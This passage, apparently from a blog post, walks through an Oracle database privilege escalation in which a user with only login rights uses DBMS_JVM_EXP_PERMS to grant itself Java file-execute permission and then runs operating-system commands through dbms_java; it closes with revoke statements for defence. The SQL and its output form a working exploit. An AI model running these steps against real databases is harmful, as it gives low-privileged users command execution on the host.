The below demonstration explain how to use it :
SQL> CONNECT / AS SYSDBA
Connected.
SQL> CREATE USER Test IDENTIFIED BY Test;User created.
SQL> GRANT CREATE SESSION TO Test;
Grant succeeded.
SQL> SELECT TYPE_NAME, NAME, ACTION FROM DBA_JAVA_POLICY WHERE GRANTEE = ‘TEST’;
no rows selected
SQL> CONNECT Test/test
Connected.SQL> DECLARE
POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;
CURSOR C1 IS SELECT
‘GRANT’,’GREMLIN’,’SYS’,’java.io.FilePermission’,'<FILES>>’,’execute’,’ENABLED’ FROM DUAL;
BEGIN
OPEN C1;
FETCH C1 BULK COLLECT INTO POL;
CLOSE C1;
DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);
END;
/PL/SQL procedure successfully completed.
SQL> CONNECT / AS SYSDBA
Connected.
SQL> COL TYPE_NAME FOR A30;
SQL> COL NAME FOR A30;
SQL> COL ACTION FOR A10;
SQL> SELECT TYPE_NAME, NAME, ACTION FROM DBA_JAVA_POLICY WHERE GRANTEE = ‘TEST’;TYPE_NAME NAME ACTION
—————————— —————————— ———-
java.io.FilePermission <> execute
As you see at first User Test Only has Create Session Privileges but after using the above package he now can execute any OS Command using Java Code.
select dbms_java.runjava(‘oracle/aurora/util/Wrapper c:\\windows\\system32\\cmd.exe /c dir>c:\\out.lst’)from dual;
To secure your database against this :
revoke execute on dbms_java from PUBLIC;
revoke execute on dbms_java_test from PUBLIC;
revoke execute on “oracle/aurora/util/Wrapper” from PUBLIC;
grant execute on sys.dbms_jvm_exp_perms to IMP_FULL_DATABASE;
grant execute on sys.dbms_jvm_exp_perms to EXP_FULL_DATABASE;
revoke execute on sys.dbms_jvm_exp_perms from PUBLIC;
Thank you
Osama Mustafa
Technology Geek 